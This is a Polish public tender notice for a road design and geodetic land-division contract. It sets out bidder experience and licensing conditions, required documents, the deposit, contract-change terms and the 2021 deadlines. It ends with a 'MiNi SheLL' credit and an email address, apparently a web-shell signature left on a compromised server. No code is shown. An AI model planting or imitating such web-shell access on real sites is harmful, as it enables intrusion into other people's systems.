postępowaniu.</h3> 1.O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w<br/>postępowaniu dotyczące:<br/>1) zdolności technicznej lub zawodowej<br/>2. Zamawiający uzna, że Wykonawca spełnia warunek jeżeli wykaże spełnianie warunków<br/>dotyczących:<br/>1) Doświadczenia Wykonawcy:<br/>Wykonanie w okresie ostatnich 10 lat przed upływem terminu składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy - w tym okresie, o podobnym charakterze do przedmiotu<br/>zamówienia:<br/>a) Minimum 2 usługi na opracowanie projektu budowlanego i wykonawczego na budowę (w<br/>rozumieniu Ustawy z dnia 7 lipca 1994 r. Prawo budowlane (j.t. Dz.U. z 2020 r. poz. 1333 z<br/>póżn. zm.)) drogi, którego zakres obejmował zaprojektowanie co najmniej drogi jednojezdniowej<br/>dwukierunkowej o: szerokości jezdni min. 6,0 m (2x min. 3,0 m), prędkości projektowej min<br/>Vp=50 km/h o długości min. 3,0 km w jednym odcinku i udokumentowanie, że usługi te zostały<br/>wykonane należycie,<br/>oraz<br/>b) Minimum 2 usługi na opracowanie dokumentacji geodezyjno-prawnej podziału działek o<br/>zakresie nie mniejszym niż podział 200 działek w jednym zamówieniu i udokumentowanie, że<br/>usługi te zostały wykonane należycie,<br/>Dopuszcza się wykonanie usług wymienionych w ppkt. a) i b) w jednym zamówieniu, lecz<br/>wówczas warunki muszą być spełnione dla każdej usługi odrębnie.<br/>2) Kwalifikacji zawodowych osób skierowanych przez Wykonawcę do realizacji zamówienia:<br/>Dysponowanie minimum jedną osobą mogącą wykonywać samodzielne funkcje techniczne w<br/>budownictwie w zakresie projektowania, sprawdzania projektów architektoniczno-budowlanych<br/>dla każdej z niżej wymienionych specjalności:a) drogowa,<br/>b) mostowa,<br/>c) instalacyjna w zakresie sieci, instalacje i urządzenia telekomunikacyjne,<br/>d) instalacyjna w zakresie sieci, instalacje i urządzenia gazowe, wodociągowe i kanalizacyjne,<br/>e) instalacyjne w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych.<br/>w zakresie dokumentacji geodezyjnej:<br/>f) posiadającą uprawnienia geodezyjne w zakresie 1 i 2.<br/>Zamawiający dopuszcza możliwość łączenia powyższych funkcji<br/>Pod pojęciem dróg, Zamawiający rozumie drogi publiczne określone w ustawie z dnia 21 marca<br/>1985 r. o drogach publicznych (Dz.U. z 2018 r. poz. 2068) lub drogi będące ich odpowiednikami<br/>w państwach Unii Europejskiej, państwach będących stronami Porozumienia Światowej<br/>Organizacji Handlu w sprawie zamówień rządowych i państwach będącymi stronami umów<br/>międzynarodowych, których stroną jest Unia Europejska.<br/>Osoby przewidziane do pełnienia samodzielnych funkcji technicznych w budownictwie muszą<br/>posiadać wymagane uprawnienia, które zostały wydane zgodnie z ustawą Prawo budowlane z<br/>dnia 7 lipca 1994 r. art. 12 ustęp 1 ppkt. 2, ustęp 7, art.12a lub uprawnienia uzyskane na<br/>podstawie przepisów obowiązujących przed wejściem w życie ustawy prawo budowlane z 1994<br/>r., natomiast w przypadku osób, które uzyskały uprawnienia w innych krajach Unii Europejskiej a<br/>także osób z Europejskiego Obszaru Gospodarczego (tj. Królestwo Norwegii, Księstwo<br/>Lichtensteinu, Republika Islandii) i obywateli Konfederacji Szwajcarskiej posiadane uprawnienia<br/>muszą spełniać warunki określone w Ustawie z dnia 22 grudnia 2015 r. o zasadach uznawania<br/>kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. 2016,<br/>poz. 65). Osoby spoza terytorium Rzeczpospolitej Polskiej muszą się legitymować decyzją o<br/>uznaniu kwalifikacji zawodowych lub decyzją o prawie do świadczenia usług transgranicznych,<br/>wydanymi przez właściwe rady izby inżynierów, albo udokumentować, że zdały egzamin na uprawnienia budowlane przed właściwą Izbą.<br/>Osoba przewidziana do wykonywania usług geodezyjnych musi posiadać wymagane<br/>uprawnienia, które zostały wydane zgodnie z ustawą z dn. 17 maja 1989 r. Prawo geodezyjne i<br/>kartograficzne (Dz.U. z 2016 r., poz. 1629.), natomiast w przypadku osób które uzyskały<br/>uprawnienia w innych krajach UE, a także osób z Europejskiego Obszaru Gospodarczego (tj.<br/>Królestwo Norwegii, Księstwo Lichtensteinu, Republika Islandii) i obywateli Konfederacji<br/>Szwajcarskiej, posiadane uprawnienia muszą spełniać warunki określone w Ustawie z dnia 22<br/>grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach<br/>członkowskich UE (Dz. U. 2016, poz. 65). Osoby spoza terytorium Rzeczypospolitej Polskiej<br/>muszą się legitymować decyzją o uznaniu kwalifikacji zawodowych lub decyzją o prawie do<br/>świadczenia usług transgranicznych.<br/>3. Zamawiający może, oceniając zdolność techniczną lub zawodową, na każdym etapie<br/>postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie<br/>przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów<br/>technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy<br/>może mieć negatywny wpływ na realizację zamówienia na każdym etapie postępowania (art.<br/>116 ust. 2 ustawy Pzp).<br/>4. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia wykazując<br/>warunek udziału w postępowaniu mogą polegać na zdolnościach tych z wykonawców, którzy<br/>wykonają usługi, do realizacji których te zdolności są wymagane.<br/>Ocena spełniania warunku udziału w postępowaniu zostanie dokonana na podstawie<br/>dokumentów i oświadczeń złożonych przez wykonawcę, na zasadzie SPEŁNIA/NIE SPEŁNIA <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a) wykaz usług, o których mowa w pkt. VIII .2.1) SWZ wykonanych w<br/>okresie ostatnich 10 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności<br/>jest krótszy – w tym okresie, wraz z podaniem ich przedmiotu, zakresu, dat wykonania i podmiotów, na<br/>rzecz których usługi te zostały wykonane, oraz załączeniem dowodów określających czy te usługi<br/>zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne<br/>dokumenty sporządzone przez podmiot, na rzecz którego usługi były wykonywane, a jeżeli Wykonawca<br/>z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie<br/>Wykonawcy;<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji usług wykonywanych wspólnie z innymi<br/>wykonawcami wykaz winien dotyczyć usług, w których wykonaniu wykonawca ten bezpośrednio<br/>uczestniczył.<br/>b) wykazu osób, o których mowa w pkt. VIII.2.2) SWZ, skierowanych przez Wykonawcę do realizacji<br/>zamówienia publicznego, wraz z imionami i nazwiskami tych osób, wskazaniem uprawnień,<br/>doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu<br/>wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami;<br/>Uwaga:<br/>W przypadku wskazania w: „Formularzu oferty" doświadczenia zawodowego osoby na stanowisku<br/>projektant branży drogowej, wykaz osób w odniesieniu do tej osoby musi być tożsamy z drukiem<br/>oferty.<br/>Szczegółowy opis dotyczący podmiotowych środków zawarty jest w pkt. IX SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Po badaniu ofert pod kątem spełniania przesłanek odrzucenia oraz po wstępnej weryfikacji oświadczeń<br/>dotyczących spełniania warunków oraz braku podstaw do wykluczenia, Wykonawca, którego oferta<br/>zostanie najwyżej oceniona na wezwanie Zamawiającego zobowiązany będzie złożyć następujące<br/>dokumenty w terminie nie krótszym niż 5 dni od dnia wezwania:<br/>a) informacji z Krajowego Rejestru Karnego, sporządzonej nie wcześniej niż 6 miesięcy przed jej<br/>złożeniem, w zakresie:<br/>- art. 108 ust. 1 pkt. 1 i 2 ustawy Pzp,<br/>- art. 108 ust. 1 pkt.4 ustawy Pzp, dotyczącej orzeczenia zakazu ubiegania się o zamówienie publiczne<br/>tytułem środka karnego,<br/>b) oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej<br/>samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007r. o ochronie konkurencji i<br/>konsumentów (Dz.U. 2020 r. poz. 1076 i 1086) z innym Wykonawcą, który złożył odrębną ofertę albo<br/>oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami<br/>potwierdzającymi przygotowanie oferty, niezależnie od innego Wykonawcy należącego do tej samej<br/>grupy kapitałowej (wzór załącznik F do SWZ);<br/>c) oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu (wzór załącznik G do<br/>SWZ), o którym mowa w art. 125 ust. 1 ustawy, w zakresie podstawy wykluczenia z postępowania<br/>wskazanych przez zamawiającego, o których mowa w:<br/>- art. 108 ust. 1 pkt 3 ustawy Pzp;<br/>- art. 108 ust. 1 pkt 4 ustawy Pzp, dotyczących orzeczenia zakazu ubiegania się o zamówienie<br/>publiczne tytułem środka zapobiegawczego,<br/>- art. 108 ust. 1 pkt 5 ustawy Pzp, dotyczących zawarcia z innymi wykonawcami porozumienia<br/>mającego na celu zakłócenie konkurencji,<br/>- art. 108 ust. 1 pkt 6 ustawy Pzp<br/>d) Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej,<br/>zamiast dokumentów, o których mowa w pkt. a), składa informację z odpowiedniego rejestru, takiego<br/>jak rejestr sądowy, albo, w przypadku braku takiego rejestru, inny równoważny dokument wydany<br/>przez właściwy organ sądowy lub administracyjny kraju, w którym Wykonawca ma siedzibę lub miejsce<br/>zamieszkania w zakresie określonym w pkt a), wystawionych nie wcześniej niż 6 miesięcy przed jego złożeniem,<br/>Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się<br/>dokumentów, o których mowa w pkt. d), lub gdy dokumenty te nie odnoszą się do wszystkich<br/>przypadków, o których mowa w art. 108 ust. 1 pkt 1, 2 i 4 ustawy Pzp, zastępuje się je odpowiednio w<br/>całości lub w części dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze<br/>wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której<br/>dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju, w którym wykonawca ma siedzibę<br/>lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem<br/>sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego,<br/>właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy, wystawionym nie wcześniej<br/>niż 6 miesięcy przed jego złożeniem;</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Warunkiem uczestnictwa w postępowaniu jest wniesienie wadium w wysokości: 5000,00 zł,<br/>(słownie: pięć tysięcy złotych )<br/>2. Wadium może być wnoszone w jednej lub kilku następujących formach zgodnie z art. 97, ust.<br/>7 ustawy Prawo zamówień publicznych:<br/>a) pieniądzu;<br/>b) gwarancjach bankowych;<br/>c) gwarancjach ubezpieczeniowych;<br/>d) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z<br/>dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z<br/>2019 r. poz. 310,836 i 1572).<br/>Pozostałe wymagania odnośnie wnoszenia i zwrotu wadium określono w pkt. XXIII SWZ. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku,<br/>wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>a) oświadczenie, o którym mowa w pkt. IX.2 SWZ składa z ofertą każdy z Wykonawców<br/>wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw<br/>wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z<br/>wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>b) w przypadku, o którym mowa w pkt VIII 4 SWZ Wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi<br/>wykonają poszczególni Wykonawcy. Oświadczenie należy złożyć wg wymogów Załącznika B do<br/>SWZ. Oświadczenie to jest podmiotowym środkiem dowodowym.<br/>c) zobowiązani są oni na wezwanie Zamawiającego, złożyć podmiotowe środki dowodowe, o<br/>których mowa w pkt. IX.6 SWZ, przy czym podmiotowe środki dowodowe, o których mowa:<br/>- w pkt. IX.6.1) SWZ składa odpowiednio Wykonawca/Wykonawcy, który/którzy Wykazuje/-ą<br/>spełnienie warunku<br/>- w pkt. IX.6.2) SWZ składa każdy z Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia.<br/>3. Jeżeli została wybrana oferta wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, zamawiający będzie żądać przed zawarciem umowy w sprawie zamówienia<br/>publicznego kopii umowy regulującej współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.2.) Informacje na temat zaliczek: </h3> Na pisemny wniosek Wykonawcy Zamawiający udzieli Wykonawcy jednorazowej zaliczki na<br/>poczet wykonania przedmiotu Umowy, w wysokości 5% wynagrodzenia brutto Wykonawcy, o<br/>którym mowa w § 5 ust. 1-2 wzoru umowy (wartość maksymalna) .<br/>Wykonawca przed otrzymaniem zaliczki wniesie Zamawiającemu zabezpieczenie zwrotu zaliczki<br/>w formie gwarancji bankowej lub ubezpieczeniowej, w wysokości 100% wysokości zaliczki.<br/>Pozostałe wymagania odnośnie udzielenia zaliczki i wnoszenia jego zabezpieczenia przez<br/>Wykonawcę określono we wzorze/projekcie umowy (Załącznik J do SWZ). <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.Zamawiający zgodnie z art. 455 ust 1 pkt 1) ustawy Prawo zamówień publicznych przewiduje<br/>możliwość dokonania zmiany umowy polegających na:<br/>1) zmianie terminu wykonania umowy w przypadku, gdy przedłużeniu uległy procedury na etapie<br/>uzyskiwania uzgodnień, opinii, postanowień lub decyzji administracyjnych.<br/>Wydłużenie terminu wykonania umowy nastąpi tylko w przypadku uzasadnionego i<br/>udokumentowanego wystąpienia wydłużenia czasu uzyskiwania ww. materiałów o ilość dni<br/>ponad terminy określone w Kodeksie Postępowania Administracyjnego i innych przepisach<br/>prawa;<br/>2) zmianie wynagrodzenia Umowy w przypadku zmiany: a) stawki podatku od towarów i usług;<br/>b) minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej,<br/>ustalonych na podstawie przepisów ustawy z dnia 10 października 2002 roku o minimalnym<br/>wynagrodzeniu za pracę;<br/>c) zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub<br/>wysokości składki na ubezpieczenie społeczne lub ubezpieczenia zdrowotne,<br/>d) zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których<br/>mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych (Dz.U.<br/>poz. 2215 oraz z 2019 r. poz. 1074 i 1572),<br/>- jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę.<br/>3) zmiana osób przy pomocy których Wykonawca realizuje przedmiot umowy na inne<br/>spełniające warunki określone w SWZ. W przypadku projektanta branży drogowej wskazana<br/>osoba powinna posiadać doświadczenie punktowane nie gorzej niż osoba wskazana w ofercie<br/>(zgodnie z kryteriami oceny ofert);<br/>4) zmianie podwykonawcy - podmiotu, na którego zasoby Wykonawca powołuje się, na<br/>zasadach określonych w art. 118 ustawy pzp, w celu wykazania spełniania warunków udziału w<br/>postępowaniu - w przypadku akceptacji przez Zamawiającego wskazanego innego<br/>podwykonawcy po wykazaniu, iż proponowany inny podwykonawca spełnia je w stopniu nie<br/>mniejszym niż podwykonawca na którego zasoby Wykonawca się powołuje w trakcie<br/>postępowania o udzielenie zamówienia oraz nie zachodzą wobec podwykonawcy podstawy<br/>wykluczenia, które zostały przewidziane względem Wykonawcy;<br/>5) rezygnacji z podwykonawcy - podmiotu, na którego zasoby Wykonawca powołuje się, na<br/>zasadach określonych w art. 118 ustawy pzp, w celu wykazania spełniania warunków udziału w<br/>postępowaniu - w przypadku wykazania Zamawiającemu, iż Wykonawca samodzielnie spełnia je<br/>w stopniu nie mniejszym niż podwykonawca na którego zasoby Wykonawca się powołuje w<br/>trakcie postępowania o udzielenie zamówienia.<br/>Wyżej wymienione przypadki dopuszczające zmianę Umowy nie stanowią zobowiązania Stron<br/>do dokonania takiej zmiany.<br/>Zmiany i uzupełnienia treści umowy wymagają dla swej ważności formy pisemnej.<br/>Szczegółowy opis rodzaju i zakresu zmian oraz warunki wprowadzenia zmian<br/>zawiera § 7 i § 10 wzoru/projektu umowy stanowiącej Załącznik J do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-09-10 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę z wymaganymi dokumentami należy złożyć za pośrednictwem Platformy zakupowej pod adresem https://zdp-powiatkrasnicki.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-09-10 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-10-09</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com